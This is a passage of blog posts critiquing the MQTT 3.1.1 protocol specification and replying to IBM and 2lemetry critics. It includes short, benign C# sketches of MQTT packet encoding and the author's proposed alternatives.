June 16, 2014
@ 07:02 AM

Last week, IBM's Peter Niblett posted a response to my MQTT analysis, saying that he is keen on a positive discussion of my observations as a contribution to the future development of MQTT by the OASIS Technical Committee that is working on the protocol. Thank you, Mr. Niblett.

That said, a friend who works as a messaging product architect at another major platform vendor chatted me on Facebook after reading the IBM post and wrote "Good response, but nothing in that post convinces me that anything you wrote was wrong". I agree, and I don't see a need to make updates to the original post.

What's worth restating in this discussion is that I took the OASIS 3.1.1 version as published and implemented it from scratch. There ought to be no need to be "in the know" or to be a member of a particular discussion circle to do so. The protocol is exactly and only what the specification document says it is. Peter provides several clarifications on technical aspects or on spec intent in his post, which I appreciate, but one of the key points of my critique is that this ought not to be required. What I say about the protocol are statements about the specification.

I'm going to use Peter's post structure:

i) Scope and intended use of MQTT

Peter starts out by providing some insight into the history of MQTT, stating that it has been used for over 15 years, that it is a better starting point than some "radically new, untried protocol", and that it is better to "standardise what already works".

I think that would be a reasonable way to start if the protocol had proven, over all that time, that it does indeed provide secure and reliable message transfer, at very significant scale, in the sort of dynamic networking and operational environments that we're debating for the "Internet of Things".

I am not at all arguing that it's impossible to get messages from A to B with MQTT. I am arguing that the protocol becomes increasingly unsuitable as the communication path quality between A and B deteriorates, as the parties become less trusted, and as the count of the A's goes into the 100,000s while the B's become large always-on clusters with failover, in-place upgrades, and a ton of required moving pieces, many of which can and do fail every once in a while.

If the protocol is 15 years old and originates from factory floor environments, it's obvious that it wasn't designed for this new world; even the mighty HTTP 1.1 is getting a massive overhaul now after 15 years, since the web community sees that new usage patterns and requirements call for the dramatic changes that are embodied in the current HTTPbis drafts. So, yes, I do indeed call into question whether MQTT "already works" for the future challenges that lie ahead.

ii) Error Handling

In my post I mentioned that I've been involved in shipping Azure Service Bus for the last 7 years. What I didn't mention there is that "shipping" also means "operating". Not only do we ship this software, we also run it ourselves. Just like any other engineer on the team, I've been on the 24/7 on-call rotation for the 5 years that our service has been in production, and we've learned to tame the fire-breathing dragons that are several dozen large clusters of hundreds of nodes each, distributed across datacenter fault domains and updated and serviced under full load – they're tamed, but they're still fire-breathing dragons. Part of the art of taming these dragons is providing as much transparency as can feasibly be provided about what goes wrong, and where, and why. There is no winning argument that can be made against making appropriate diagnostics information available to all communicating parties.

In his reply, Peter argues against putting error information on the wire, because that would serve no purpose:

If the protocol were to send detailed error information to the clients, it's unlikely that they would be able to do much with it other than send it back in to a central Problem Determination system. It's more practical for error logging and diagnosis to be done centrally by the server, so in many cases there's no real need to pass the information to the clients.

That's an interesting stance, because of the inherent notion that server and client are part of a system that can be supervised and analyzed centrally. That may be true for a traditional enterprise or factory floor messaging system. It's not true for any contemporary solution I get to help with.

All communicating parties need to be able to understand what went wrong and why, during development time and at runtime, especially with globally distributed parties, distributed ownership of digital assets, and when communication spans trust boundaries.

Imagine HTTP were doing this and client-induced errors got no feedback. Would there be some server where you'd have to look up your 404s?

Also, and that's a nit on the above point: the publishing gestures of MQTT are symmetric, so if a device rejects a message sent by a server for any reason, even such a problem determination system would be in the dark. How would it ever get at that information if the client hoards it?

The stance reveals a lot about why this debate is happening: MQTT carries the DNA of an architecture model where all parts of the system are built, owned, and operated by one party, and where that one party has, or can easily gain, full access to such diagnostics information at all times.

In the same section, Peter defends the absence of an error feedback path for PUBLISH:

The server is permitted to accept an unauthorised PUBLISH message and not drop the network connection, provided that it doesn't forward the unauthorised message on to any subscribers.

While that seems like a reasonable workaround, that is not what the specification says. The spec says "If a Server implementation does not authorize a PUBLISH to be performed by a Client; it has no way of informing that Client. It MUST either make a positive acknowledgement, according to the normal QoS rules, or close the Network Connection".

The specification doesn't state Peter's authorization caveat, at all. In fact, there are actually rules in the QoS section of the specification that stand against this approach; for instance "A Server MUST store the message in accordance to its QoS properties and ensure onward delivery to applicable subscribers" [MQTT 4.3.2-2].

In MQTT an authorization failure during publishing will either cause the connection to drop or the server will – if following Peter's strategy – intentionally lie to the client.

Imagine the astonishment of a client that has been sending gigabytes of gold-plated mobile M2M bytes for several days into a misconfigured server whose authorization rules are wedged, while the server happily reports the messages as accepted and actually tosses them out as they arrive. That recommendation is worse than disconnecting.

iii) Session State Durability

In this section, Peter provides some further explanation of the session state model, in clearer terms than the specification I am discussing, and says:

[…] a server is indeed entitled to kill a Non-Durable Session if it wishes, though presumably customers would think twice about using a server that does this a lot. 

My point is that the specification is wishy-washy about it and that it ought not to be.

The point is also that in a world where software systems aren't running within the four walls of one company, there's not necessarily a choice about whether customers will or will not use a particular server. That server sits over there, is run by someone else, and you have to use it. For that, the specification ought to provide predictability and clear guidance, including, potentially, reliability profiles. A purely ephemeral in-memory server shouldn't even have to pretend to support QoS 2 or "Retain".

1) Suitability of MQTT for IoT use-cases

In this section, Peter defends MQTT's suitability for IoT use-cases by commenting on some of the points I made in my original article. Of the ones I didn't already address above, only the TLS session resumption argument stands out for me:

On my paraphrased point "Transient errors force a disconnect, which results in a renegotiation of a TLS connection and this is costly", Peter responds "I would hope that, although they will occur, transient errors are likely to be rare - probably rarer than network failures. In any case TLS has a special path that allows a Session to be resumed quickly without going through the full TLS handshake."

TLS has, in the form of RFC5077, a stateless session recovery model, which is available via explicit opt-in gestures on server and client in most SSL/TLS libraries. The MQTT 3.1.1 specification mentions this RFC.

Peter is correct that RFC5077 support will limit the impact of disconnects, but I'd be interested in how many libraries implementing TLS/SSL for MQTT also leverage this feature of their respective underlying SSL/TLS library, so that this can be consistently relied on.

In my original post I criticize the name-dropping in the security section, which looks like a scratchpad of notes rather than firm guidance. The mention of RFC5077 looks like this:

Constrained devices and Clients on constrained networks can make use of TLS session resumption [RFC5077], in order to reduce the costs of reconnecting TLS [RFC5246] sessions.

Even if the protocol sticks to its "in doubt: disconnect" attitude around errors, which I hope it won't, it would do it good to take more assertive ownership of its security model and prescribe how TLS ought to be used in precise terms, including prescribing RFC5077 support.

2) Difficulties of Implementing an Internet Scale MQTT Server

Peter admits that it is hard to build multi-server MQTT servers, but points out that there are available implementations. I'm somewhat struggling to find MQTT servers that support the breadth of the spec (including QoS 2) in a multi-node configuration of non-trivial size (i.e. more than 4 nodes) with robust failover support including in-flight deliveries.

I looked at a few.

RabbitMQ doesn't seem to support QoS 2; ActiveMQ/Apollo's MQTT adapter holds in-flight deliveries in non-replicated in-memory state; for Mosquitto I can't find the clustering option; even IBM's MessageSight appliance only seems to support a hot/warm clustering model with at most two nodes; and HiveMQ seems to replicate messages between cluster nodes, but doesn't appear to replicate in-flight delivery state for when a node fails and a secondary kicks in.

Now, I only looked at a few and I'm only looking at things from the outside where I can't see code or clustering docs, so I'll be happy to hear if there's something I can look at for reference.

3) Missing Features you would expect in a Messaging Protocol

This is the section in Peter's post that I am very grateful for, because he's acknowledging that I identified a list of shortcomings that seem reasonable to consider for a future version.

Where I disagree with Peter is his view that metadata extensibility shouldn't go beyond the PUBLISH packet. I believe the MQTT spec would benefit from a generalized message model where variable headers and their format options are clearly defined upfront, instead of having to be inferred from the individual packet descriptions. Why such a generalized message model couldn't also define a model for carrying a metadata dictionary isn't clear to me.
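To illustrate, here's a minimal sketch of the kind of generalized packet model I have in mind, reusing the two-byte length-prefixed UTF-8 strings MQTT already employs elsewhere. This is an illustration of the concept, not a concrete wire-format proposal:

```csharp
using System.Collections.Generic;
using System.IO;
using System.Text;

// Illustrative only: a generalized packet model where every packet shares
// one layout discipline and can carry a metadata dictionary, encoded as
// alternating length-prefixed key and value strings.
class ExtensiblePacket
{
    public byte PacketType;                         // the existing 4-bit type
    public IDictionary<string, string> Metadata =   // the hypothetical addition
        new Dictionary<string, string>();
    public byte[] Payload = new byte[0];

    public void WriteMetadata(BinaryWriter writer)
    {
        foreach (var pair in Metadata)
        {
            WriteLengthPrefixedString(writer, pair.Key);
            WriteLengthPrefixedString(writer, pair.Value);
        }
    }

    static void WriteLengthPrefixedString(BinaryWriter writer, string text)
    {
        byte[] bytes = Encoding.UTF8.GetBytes(text);
        writer.Write((byte)(bytes.Length >> 8));    // two-byte big-endian length
        writer.Write((byte)(bytes.Length & 0xFF));
        writer.Write(bytes);
    }
}
```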

In closing

Lastly, Peter calls Microsoft to action. Whether Microsoft might or might not join the OASIS TC isn't a point I will or even can debate here, because I'm not speaking for the company on my own personal blog (and these posts don't go to blogs.msdn.com/clemensv, if you noticed). I'm also not working in the group at Microsoft that drives standardization, so I would likely not be directly involved in the day-to-day TC work in any event, since my day job is implementation, not creating specifications.

What I would consider a prerequisite for recommending such an engagement, if someone were to ask me, is that the TC be willing to allow significant changes for the next revision and strike the backward compatibility mandate.

I stand by my statement that MQTT, in its current form, is not a protocol that's setting us up well for the "Internet of Things" future as I see it. The protocol needs urgent fixes in error handling and message metadata flow. It ought to, in my view, provide a clearly delineated set of reliability and feature profiles, making features like retain, Will, and QoS 1/2 optional layers, since some of them are very hard to implement correctly at scale or require special authorization and resource governance models. And it needs to take firm ownership of authorization and its on-wire security model, including explicitly allowing for token-based authorization of sessions.

-

Thank you for reading this and I hope you consider this useful in spite of the leadership of the Eclipse Foundation (and oddly really just them) calling my posts FUD, flame war, and not a community service. I believe this discussion is a community service. And I wrote this on Sunday.


June 4, 2014
@ 07:10 AM

Tim Kellogg from 2lemetry felt compelled to write a response to the MQTT analysis I posted Monday. Debate is good.

I believe there is a difference, however, between being directly and openly critical of the product of a public standards body that gets broadly advertised as the "de-facto" standard by the specification's main sponsor, and individual name-calling.

Tim chose to describe me as “a man who prefers flame wars over professional dialog” based on that post and in spite of having civilized exchanges with me on Twitter in the past. This didn’t strike me as a particularly good example of professional dialog by itself, so I felt like I ought to call out that sentence on Twitter.   

So … Dear Tim, I spent quite the better part of a week implementing my MQTT 3.1.1 protocol core and I spent 3 days furnishing a critical, in-depth technical analysis of MQTT, including providing what I believe is required industry context from my vantage point about the role of a particular major vendor. If you find this personally offensive and the analysis and backstory portrayal challenges you personally into a "flame war", I don't quite know what to say about that.

Tim also states "Obviously Clemens misunderstands the goals of MQTT", which is a fine rhetorical attempt to blanket-disqualify my analysis. Maybe that is even true in a very narrow sense, in that I care very little about the immediate goals of the OASIS MQTT 3.1.1 Technical Committee and instead have a laser focus on solving the immediate problems brought to me by a range of large consumer and industrial goods manufacturing companies that want to get going with realizing their Connected Home, Connected Car, Industrie 4.0, or Smart Energy solutions at scale. In that sense, I may "misunderstand" the goals in that I actually disagree with some of them, for the benefit of these customers.

MQTT has no facility for an application to hint at the payload content, carry a key hint for end-to-end encrypted payloads, provide a message subject or label for dispatching the message before decoding the payload, or even carry a timestamp for when the message was sent on its way at the origin. I am personally convinced that custom metadata extensibility is part of the table stakes for any messaging protocol that I will recommend to my customers, even if Andy Piper seems to believe that this insistence and the remainder of my analysis are laughable (without linking to it!) and amount to asking for "the kitchen sink".

Another underhanded questioning of the correctness of my analysis concerned my allusion to chat scenarios.

Indeed, I do allude to chat, which was actually meant as a reference to the Facebook Messenger scenario in the abstract. The MQTT post is 9500+ words and I scoped out the interactive scenario. I actually have reached out to my friends in Facebook engineering to get insight into the exact MQTT usage profile, but I can already say that an interactive chat application on a $500 mobile phone with a flat rate data contract on 4G/LTE isn’t quite the same as the two scenarios (connected car and smart meter) I mentioned in my write up. The car scenario and the data volume constraints I mention are not a fabrication, and the national roaming network hopping issues don’t exist for phones on voice contracts, because providing cross-carrier roaming is massively constrained by regulation. Apples and Oranges.

Back to Tim, he’s also making the somewhat surprising statement in response to my IBM references on MQTT that “IBM has mostly left it alone” in the standardization process. I’m afraid I can’t follow that claim looking at the TC chair and the specification editor list.

Tech

Tim also has technical responses, of course. Sadly the slightly miffed undertone (“almost valid”, “didn’t seem to take time to fully understand that.”) continues:

“One complaint that is almost valid is the variable 1-4 byte remaining length field […]”

In this paragraph he says that I'm asking to constrain the remaining length to 2 bytes. I'm not; I offer 2 or 4 bytes: "It could also just say that the length indicator is either two or four bytes long and if bit 15 of the two-byte integer were set, it'd be a 31-bit integer and you need to factor in the next two bytes and just mask out the most significant bit.". In fact, I'm OK with either the 7-bit encoding or fixed-length prefixes, if only their use were consistent in the protocol.

On my critique of the version identifier, Tim says my proposal were for the "MQTT" string to "be just the raw 4 bytes without the prefixed length". That again reflects a quite cursory reading of what I really wrote, because I am quite specifically asking for a different shape of those 4 bytes and I ask to move them to the beginning of the MQTT stream: "the UTF-8 characters for 'T' and 'T' and a trailing version counter of two bytes as you'll want to give yourself some room for spec revisions, instead of presenting this were an extensible thing? And then put that 4-byte preamble at the beginning of the stream, so a server can pick the implementation stack as the connection opens?"

In the next paragraph he objects to me adding the underlying protocol overhead of IPv4/6, TCP, and TLS to the size of the MQTT message wire footprint, pointing at the effects of Nagling (see RFC896). Nagling means that a network frame gets stuffed with data until either the designated output frame is filled up or until a timer elapses (often 200-500ms), which I explicitly refer to in the respective paragraph of my post.

Yet, in the next paragraph he also objects to me pointing out an overflow and collision risk on the packet identifier with 64K in-flight messages. It's difficult to argue Nagling and minimal wire footprint and then object to that being pointed out as a risk. Tim says that a device with 100 KByte of memory would never have that many messages in flight. I agree. An industrial machine funneling consolidated sensor observations to an analysis backend quite well might, though, and it might want to take advantage of a low-overhead protocol over a long-haul stream transport (Tim offers MQTT-SN, an IBM protocol not in OASIS, as an alternative, but that's exactly not for TCP as per mqtt.org).

Coming back to the extensibility point, Tim argues that "content-type" were nonsensical because all common use of MQTT follows a particular set of conventions, like the payload containing UTF-8 text for metric values provided on (nonstandard) system topics implemented in some brokers. I agree that convention is good, but even in the given use-case I may prefer expressing numbers as binary integers, and there's no way I can express that preference. Content-type negotiation is such a foundational concept today that it's really hard to successfully maintain that argument.

Discourse

The notion I reject, and which not only Tim but also several others have expressed, is that I ought to have brought these points to the Technical Committee during the comment period on MQTT 3.1.1, and that my blog and Twitter (and thus a debate out in the open) are not the right forum for voicing such concerns. The suggestion is that I ought to take all this to OASIS so that it can be discussed on the mailing list – which is open to the public to view, but obviously not quite as visible.

There is a very odd sense of entitlement being expressed here. When I take a public specification, especially one that's getting so much marketing push, and implement it as a programmer/architect, I owe the Technical Committee absolutely nothing, irrespective of my place of work. My job is to create platform solutions for large scale business applications. I evaluate protocols, interpret and implement them, and move on to the next protocol. I'm not a protocol standardization diplomat. Microsoft is a large company, and we also have quite excellent people in these roles. My role or career doesn't hinge on a particular protocol; if AMQP (which I'm said to be underhandedly promoting) were to fall off the face of the earth tomorrow, I'd shrug and implement the next thing, if there were an adequate replacement.

When the reality I find is in grave dissonance with the marketing claims, however, I believe that I owe the public, and specifically the colleagues, partners, and customers who come to me and seek my immediate advice, an in-depth analysis of what I found, shared on the stage I have. Which is this one. You can go back more than 10 years here and find that this is how I roll, before and during my Microsoft career. The OASIS TC can find this consolidated feedback quite well here, and it looks like it made it to the mailing list alright.

It’s also been criticized that I bring this forward just after the public comment period of MQTT 3.1.1 finished and that that timing is suspicious. It’s not. Turns out that the sort of changes I am proposing are largely out-of-charter for MQTT 3.1.1. The TC charter is very clear:

Changes to the input document, other than editorial changes and other points of clarification, will be limited to the Connect command, and should be backward compatible with implementations of previous versions of the specification such that a client coded to speak an older version of the protocol will be able to connect to, and successfully use, a server that implements a newer version of the protocol.

That’s been reinforced by Nick O’Leary’s comment in March:

There was actually no point in bringing any of these points to the TC before 3.1.1 is done and they are gearing up to actually fix the protocol deficiencies, which I am not alone in finding.

It’d be awfully nice if the folks invested in MQTT would be willing to have a serious technical debate and acknowledge that my analysis and proposals have merit instead of trying to ridicule it. I have an enormously thick skin for ad-hominem arguments; you can call me things if that helps the ultimate goal of getting to a solution that helps my customers.

I may have brought the firewood to the town square, but I didn’t light it.


A few weeks ago, I sat down in front of an empty C# project, with a printout of the latest OASIS MQTT 3.1.1 specification review draft, and started to implement the protocol from scratch.

There were several reasons, including a few non-technical ones, not to pick up an existing implementation like, for instance, Paolo Patierno's M2Mqtt library (which I'm using as a test client); one was that I required a server implementation with a certain shape of hooks, but a key reason was that I wanted to understand the MQTT protocol at an implementer's level.

As I started, I had a good but still cursory understanding of MQTT, probably at about the same level as anyone reading the "the de-facto standard protocol of Internet of Things" claims in semi-technical articles that cover its existence, but not its function. Published consensus is that it's very compact, it's easy to implement, and it's originating from and backed by IBM, and therefore must be a default good choice for device scenarios.

After implementing most of it, and I will explain which parts I left out and why, I am very disappointed.

Two exemplary scenarios I have in mind as I write this are bi-directional, long-haul communication with moving vehicles on GSM/LTE with national cross-carrier roaming, and bi-directionally connected Smart Meters on 802.15.4 based networks over unlicensed, and thus potentially very congested, public frequency spectrum. These are two key volume scenarios for the "Internet of Things" as I see it shaping up. Interestingly, you can read success stories for MQTT for these exact scenarios; and I do have some sense for how well things are really going in some of those.

The conclusion I will explain in this post is that MQTT is not a good protocol for long-haul communication (i.e. across the Internet), especially not when the going gets tough. It's also not a particularly well-designed protocol. That is also why this article is as long as it is.

Before I get into the details, there's a little bit of backstory that ought to be told, and that backstory is about IBM and the context in which MQTT came into being. As you consider the following, mind that while I work at Microsoft, this is my personal perspective; I'm not having my posts read, reviewed, or approved by marketing. I care about stuff working right, and about making stuff work right, and I also care about honesty and transparency in engineering.

IBM has a very successful enterprise messaging business and has had it for many years; related product names are MQSeries and WebSphereMQ. "Successful" is an understatement. They dominate the space. And as they dominate, IBM has held the MQ wire protocol under tight wraps, until today. The Advanced Message Queuing Protocol (AMQP) development effort started as a customer-driven initiative of Wall Street banks aiming to create an alternative messaging protocol, with the goal of breaking out of that lock-in.

It is very interesting to observe how IBM is now playing open-protocol champion, having repurposed the "MQ Integrator SCADA Device Protocol" into MQTT, and driving community efforts on the connected-devices front, while still keeping MQ closed and conveniently positioning a fairly expensive messaging appliance offering as a bridge.

That appliance speaks MQTT out to the device-side and MQ out to the backend-side. IBM has steadfastly refused to join the AMQP effort from the earliest days, so it doesn't seem like the motivation behind their strategy is ubiquitous messaging interoperability. I believe, personally, that IBM has published MQTT specifically to segregate messaging protocols in order to protect the MQ business. I believe IBM kept and keeps MQTT intentionally limited. Yes, IBM indeed has an AMQP 1.0 protocol runtime in beta called MQ Light, which seems like a nice way to funnel AMQP traffic into MQ without implementing AMQP. But this article is not about AMQP. It's about MQTT.

MQTT is not a messaging protocol; I would call it a funnel protocol serving to move binary frames of data, preferably from constrained clients into data collection systems. It's too limited for actual messaging work, which requires message metadata that a broker can work with. It is doing reasonably well at a very, very narrow set of use-cases and it is terrible at everything that goes beyond those use-cases. What it's reasonably good at is best-effort, raw-data ingestion from clients and best-effort raw-data delivery to clients using a solicit-push pattern (I'll have an explanation later). And as it turns out, the things MQTT is good at can be done in much simpler ways, while retaining more flexibility at the same time.

As we go through MQTT, the text will have many hyperlinks to various places in the MQTT specification, so there's no great danger for me to get off the rails with regards to the facts. Mind that the hyperlinks can't go to precise sections because the OASIS MQTT 3.1.1 specification doesn't have a lot of hyperlink anchors.

My goal is to simultaneously explain MQTT coarsely (go to the spec for details) and then comment on it.

Connection Model

MQTT is a session-oriented protocol overlaid over a stream transport protocol that has a clear notion of a client and a server [MQTT 4.2]. On TCP, MQTT clients connect to the server port 1883 for plaintext communication (the IANA port registration shows up as ibm-mqisdp). Using TCP with overlaid TLS, MQTT clients connect to the server port 8883 for secured communication. [MQTT 5.1]

An MQTT connection over an existing (TLS) socket is established through a handshake, with the client sending a connect packet, and the server replying with a connack packet. When the session is rejected, the server will terminate the connection after the connack, which will then contain an error code, has been sent.

The connect packet allows initializing quite a few capabilities. Because it is the first message flowing, it carries a protocol name and version indicator. It also carries a set of protocol flags that describe the connect message itself and how the broker shall treat it, and depending on those flags it optionally carries authentication information (username/password), and also a "Will" message.
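For illustration, here's a sketch of the bytes of a bare-bones 3.1.1 connect packet, assuming a clean session, a short client identifier, and no Will, username, or password:

```csharp
using System.Collections.Generic;
using System.Text;

// Builds a minimal MQTT 3.1.1 connect packet; the remaining length fits
// into a single byte here because the client identifier is short and no
// optional payload fields are present.
static class ConnectPacket
{
    public static byte[] Build(string clientId, ushort keepAliveSeconds)
    {
        byte[] clientIdBytes = Encoding.UTF8.GetBytes(clientId);
        var body = new List<byte>
        {
            0x00, 0x04, (byte)'M', (byte)'Q', (byte)'T', (byte)'T', // protocol name
            0x04,                                // protocol level 4 = MQTT 3.1.1
            0x02,                                // connect flags: clean session only
            (byte)(keepAliveSeconds >> 8),       // keep alive, big-endian
            (byte)(keepAliveSeconds & 0xFF)
        };
        body.Add((byte)(clientIdBytes.Length >> 8));   // payload: length-prefixed
        body.Add((byte)(clientIdBytes.Length & 0xFF)); // client identifier
        body.AddRange(clientIdBytes);

        var packet = new List<byte> { 0x10 };    // fixed header: connect, flags 0
        packet.Add((byte)body.Count);            // remaining length, single byte
        packet.AddRange(body);
        return packet.ToArray();
    }
}
```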

"Will" [MQTT 3.1.2.5] is an interesting concept. It allows the client to park a message with the server for the duration of the session, and that message gets published on the server to a specified "Will Topic" once the session gets unexpectedly torn down for any reason. A clean "disconnect" from the client will cancel the "Will", i.e. it will not be sent.

Message Structure

One of MQTT's goals is for it to be super-compact on the wire. That's also arguably one of its greatest appeals. To that end, the preamble of each message can be as tiny as 2 bytes. The first byte splits into two nibbles [MQTT 2.2].

The first nibble (4 bits) indicates the packet type and the second nibble holds special flags related to that packet type. The packet type serves as the operation selection criterion for the MQTT stack. The protocol can therefore accommodate exactly 16 different packet types, of which 14 are currently used and 2 have a hard reservation, causing a mandatory protocol violation error when used [MQTT 2.2.1].

The second byte is the start of the packet length indicator, which is a sequence of 7-bit integers (the value sits in bits 0-6). Whenever bit 7 is set, the next byte carries a further 7-bit value complement, weighted by another factor of 128 relative to the current one. Thus, a packet length of 127 or less can be expressed in one byte, and as up to four bytes are allowed, the encoding allows for packets of up to 256MBytes [MQTT 2.2.3].
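Decoding that length indicator looks roughly like this in C#, following the pseudo-code the spec itself includes [MQTT 2.2.3]:

```csharp
using System.IO;

static class RemainingLength
{
    // Reads the variable-length "remaining length" field, one byte at a
    // time; at most four bytes, each contributing 7 bits of the value.
    public static int Decode(Stream stream)
    {
        int multiplier = 1;
        int value = 0;
        byte encodedByte;
        do
        {
            int read = stream.ReadByte();
            if (read < 0) throw new EndOfStreamException();
            encodedByte = (byte)read;
            value += (encodedByte & 0x7F) * multiplier;
            if (multiplier > 128 * 128 * 128)    // a fifth byte is malformed
                throw new InvalidDataException("Malformed remaining length");
            multiplier *= 128;
        }
        while ((encodedByte & 0x80) != 0);       // bit 7 = continuation
        return value;
    }
}
```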

This preamble sets the tone for most of MQTT, which is that the protocol is dictated by (unfortunately not consistent) wire-footprint greed and will trade away many of the key capabilities of modern protocols for reduction of wire footprint. Unfortunately, the spec doesn't tell the whole story about the actual wire footprint, and some of the decisions start looking questionable once you start looking at the true wire-footprint with IP and TCP headers and the requisite TLS framing added, as well as what you need to put into the payload to compensate for what MQTT does not provide.

The packet type indicator nibble with the accompanying flags nibble nicely demonstrates that greed, but simultaneously shows that MQTT doesn't have much future runway as a protocol without some drastic changes. If the protocol needs to add just one more packet type (and that need exists if proper error handling were added), the only way to rescue the current structure would be to use the last reserved value as an escape hatch and start putting packet types elsewhere, and the only good place seems to be that other nibble, since everything else would mess up the protocol structure even more. So the extensibility runway, even for new protocol revisions, is very constrained.

The length indicator greed and related computation requirement is also somewhat surprising when we consider that the goal is to connect very constrained devices on metered networks and that you may not only want to be saving every byte, but also saving on overall protocol overhead and compute overhead.

The extra protocol overhead sizes to be aware of are at least 40 bytes TCP/IPv4 and 60 bytes TCP/IPv6 packet overhead for any first-try successful transmission, plus about 40 bytes TLS frame overhead. On IPv6 networks, which will be the norm for at least part of the communication paths for many devices in the future, the base transport packet overhead thus sits at some 80-100 bytes at a minimum. This is the base wire-footprint cost for any MQTT packet, when we neglect Nagling effects where a device would send many distinct messages within a short time that then would be able to hitch a ride inside the same TLS frame.

In this overall context, MQTT chooses a 7-bit encoding requiring a calculation that the spec even includes pseudo-code for. It could also just say that the length indicator is either two or four bytes long and if bit 15 of the two-byte integer were set, it'd be a 31-bit integer and you need to factor in the next two bytes and just mask out the most significant bit. That's easier to code, and it also frees up 2 more bits.

You'd pay for a simpler model with potentially losing 1 byte compared to the 7-bit encoding on messages smaller than 128 bytes. It's worth debating whether sending messages of 128 bytes or less (including further MQTT overhead that I'll discuss in the following) is a good use of precious metered bandwidth. At that size, you're going to be sitting at or near 50% pure protocol overhead over your payload when using TCP/IPv6 and overlaid TLS. But you will have saved a byte.
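For comparison, here's a sketch of the two-or-four-byte alternative I'm describing; nothing below is in the spec, it's my counter-proposal, with error handling elided:

```csharp
using System.IO;

// Bit 15 of the leading two-byte big-endian integer acts as the escape
// into a 31-bit length spread over four bytes.
static class TwoOrFourByteLength
{
    public static void Encode(Stream stream, int length)
    {
        if (length < 0x8000)                    // fits in 15 bits: two bytes
        {
            stream.WriteByte((byte)(length >> 8));
            stream.WriteByte((byte)length);
        }
        else                                    // 31-bit value: four bytes,
        {                                       // most significant bit set
            uint encoded = 0x80000000 | (uint)length;
            stream.WriteByte((byte)(encoded >> 24));
            stream.WriteByte((byte)(encoded >> 16));
            stream.WriteByte((byte)(encoded >> 8));
            stream.WriteByte((byte)encoded);
        }
    }

    public static int Decode(Stream stream)
    {
        int hi = (stream.ReadByte() << 8) | stream.ReadByte();
        if ((hi & 0x8000) == 0) return hi;      // two-byte case
        int lo = (stream.ReadByte() << 8) | stream.ReadByte();
        return ((hi & 0x7FFF) << 16) | lo;      // mask out the escape bit
    }
}
```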

Following the 1 to 5 bytes of preamble ("fixed header"), MQTT defines specific layouts for the various control packets. The first portion of that layout is called the "variable headers" [MQTT 2.3] and the second is called "payload" [MQTT 2.4], but the spec is fairly confused about where to draw the line between these and how they're interrelated.

On the connect packet, the "variable headers" carry the protocol version identifier, keep alive indicator, and session control flag, but also declare the layout of the following payload section. The payload section then begins with the mandatory client identifier, and it feels very arbitrary that this ought to be a payload component while the version indicator string is a header component.

It appears just as arbitrary that the "Will" mechanism is split apart across the header section (QoS) and the payload section (topic and payload). Sadly, that is a theme of the spec: it lacks principle on what is payload and what is header.

There are four kinds of header value encodings in MQTT.

The two-byte length-prefixed string is inconsistent with the 7-bit encoding effort on packet length; even the MQTT version-indicator string header in the "connect" packet is wasting a byte with an extra zero for the 4-character string "MQTT".

Protocol Versioning

The versioning story of MQTT is a sad chapter and nearly comical given all the greed that goes into the preamble. The MQTT 3.1.1 connect message burns up 7 bytes to tell you who it is, and the MQTT 3.1 connect message (IBM's last version before submitting to OASIS) burns up 9 bytes for announcing "MQIsdp" and the protocol sub-version, which is a single byte header following that string.

When a protocol implementation is able to read that version indicator, it's already at least 2, if not 5, bytes into reading the message, as the protocol name and protocol version indicator trail the fixed header preamble. The specification also treats any use of unspecified values as a protocol violation. It doesn't do so for the packet types explicitly, but it does so for the associated flags, so if you implement the current version correctly, you will be nuking the connection before you can even read the version string should a new revision of the protocol introduce a new packet type or change the permitted flags.

That means that the fixed section of the protocol is, if implemented correctly, effectively locked in forever in the current shape, and it will require hacks to change.

What I absolutely didn't expect was that MQTT 3.1 and MQTT 3.1.1 (the OASIS edit) would use a wholly different protocol identifier string. A MQTT 3.1.1 client will cause any correct MQTT 3.1 broker to reject connections, even though that's the only difference between the versions. What's worse is that the spec further limits its own runway by locking that in, making the length indicator bits explicit and normative and stating: "The string, its offset and length will not be changed by future versions of the MQTT specification." [MQTT 3.1.2.1].

Then why have all these 6 bytes and not just use, maybe, the UTF-8 characters for 'T' and 'T' and a trailing version counter of two bytes as you'll want to give yourself some room for spec revisions, instead of presenting this were an extensible thing? And then put that 4-byte preamble at the beginning of the stream, so a server can pick the implementation stack as the connection opens?

Extensibility

If your impression so far is that MQTT is an extensible protocol, as I have been writing about fixed and variable headers, control types, and payloads, then I must apologize for misleading you in the same way that the MQTT spec is misleading. MQTT is not extensible, at all.

MQTT is a protocol design that sets the clock back at least 20 years, while the rest of the distributed systems community has made extensibility and Postel's robustness principle driving considerations for practically all modern protocol designs.

If you read the spec and ignore the differentiation between "header" and "payload" and just think of the various information bits as "fields", you get closer to what the spec actually describes. The "connect" message is composed of a sequence of 8 required fields and 4 optional fields. The optional fields' presence is indicated in the content of the prior 8 fields.

"Header" telegraphs the presence of a concept that MQTT doesn't provide and that you may think of reading the spec: custom message metadata extensibility.

MQTT has no facility for a client to communicate application-specific information to the server or the recipient. There really are no application-usable headers. There is no specified way for the client to indicate anything about a published message to the infrastructure, and there is no specified way for the client to attach metadata to a message that provides functional information outside the message payload.

For someone accustomed to protocols like HTTP, XMPP, AMQP, or even approaches where people throw JSON on a WebSocket, the notion of lack of extensibility may be pretty hard to grasp in a "what do you mean?" kind of way. There is no custom metadata. Whatever you want to tell the other side outside of what the spec says, must go into the payload and it can only go into the payload of the one packet type that allows for a free form payload: publish.

The rest of MQTT, all other 13 defined gestures, is a non-extensible locked box and one with a weak versioning story at that. You either take the protocol as-is, in the current shape, or you don't. Some people might see that as a virtue; I find the notion of lack of extensibility for the key gestures of a protocol horrifyingly backwards.

There are obviously potential hacks to get around that limitation for that one precious publish packet type. It's conceivable to throw custom metadata into the publish message's topic name field in a sort of a query string – but what would be the format of that? Hacks are hacks.
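To make the hack concrete, here's a sketch of the query-string abuse of the topic name; the separator convention and the metadata keys are all made up, which is precisely the problem:

```csharp
using System;
using System.Collections.Generic;

static class TopicMetadataHack
{
    // Smuggles metadata into the topic name; no broker or subscriber is
    // obliged to understand this, because no spec defines it.
    public static string Append(string topic, IDictionary<string, string> metadata)
    {
        var parts = new List<string>();
        foreach (var pair in metadata)
            parts.Add(Uri.EscapeDataString(pair.Key) + "=" +
                      Uri.EscapeDataString(pair.Value));
        return topic + "?" + string.Join("&", parts);
    }
}

// Append("vehicles/4711/telemetry",
//        new Dictionary<string, string> { { "content-type", "application/json" } })
// yields "vehicles/4711/telemetry?content-type=application%2Fjson"
```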

Payload Encoding

